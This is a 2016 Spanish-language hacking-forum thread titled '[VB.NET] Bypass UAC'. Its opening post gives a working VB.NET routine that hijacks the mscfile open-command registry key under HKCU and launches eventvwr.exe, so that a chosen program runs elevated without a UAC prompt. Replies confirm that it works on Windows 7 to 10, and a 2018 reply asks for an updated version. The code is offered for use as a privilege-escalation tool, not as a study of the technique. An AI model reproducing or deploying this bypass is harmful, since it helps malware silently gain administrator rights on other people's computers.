Underc0de - La Casa de los Informáticos

Programación General => C# - VB.NET => Mensaje iniciado por: fudmario en Noviembre 04, 2016, 12:59:52 AM

Título: [VB.NET] Bypass UAC
Publicado por: fudmario en Noviembre 04, 2016, 12:59:52 AM
Código (vbnet) [Seleccionar]

Public Sub Bypass_UAC(ByVal filepath As String)
            'Based: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
            Using regkey As RegistryKey = Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command")
                regkey.SetValue("", filepath, RegistryValueKind.String)
            End Using
            Process.Start("eventvwr.exe")
        End Sub




Update:
Change : OpenSubKey ---> CreateSubKey
Título: Re:[VB.NET] Bypass UAC
Publicado por: 79137913 en Noviembre 04, 2016, 08:54:50 AM
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
Título: Re:[VB.NET] Bypass UAC
Publicado por: grep en Noviembre 04, 2016, 11:37:38 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esto realmente funciona? para que SOs?

CitarThis technique has been tested on Windows 7 and Windows 10, but is expected to work on all versions of Windows that implement UAC.

fuente:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

Saludos
Título: Re:[VB.NET] Bypass UAC
Publicado por: fudmario en Noviembre 04, 2016, 12:06:16 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
Win7, Win8, Win8.1 y Win10 (x86 - x64).
Aunque si se modifica el Control de Cuentas de Usuario se puede bloquear esto.
Título: Re:[VB.NET] Bypass UAC
Publicado por: sadfud en Noviembre 04, 2016, 01:13:52 PM
Si, si funciona, es mas, esto se le notifico a microsoft ( como pone en el blog de enigma) y no parece que les importe demasiado.

Gracias por la implementacion
Título: Re:[VB.NET] Bypass UAC
Publicado por: jbroken en Febrero 03, 2018, 05:15:59 PM

unfortunately this method does not work anymore  >:(. is there any updated system?
maybe an example code would be ideal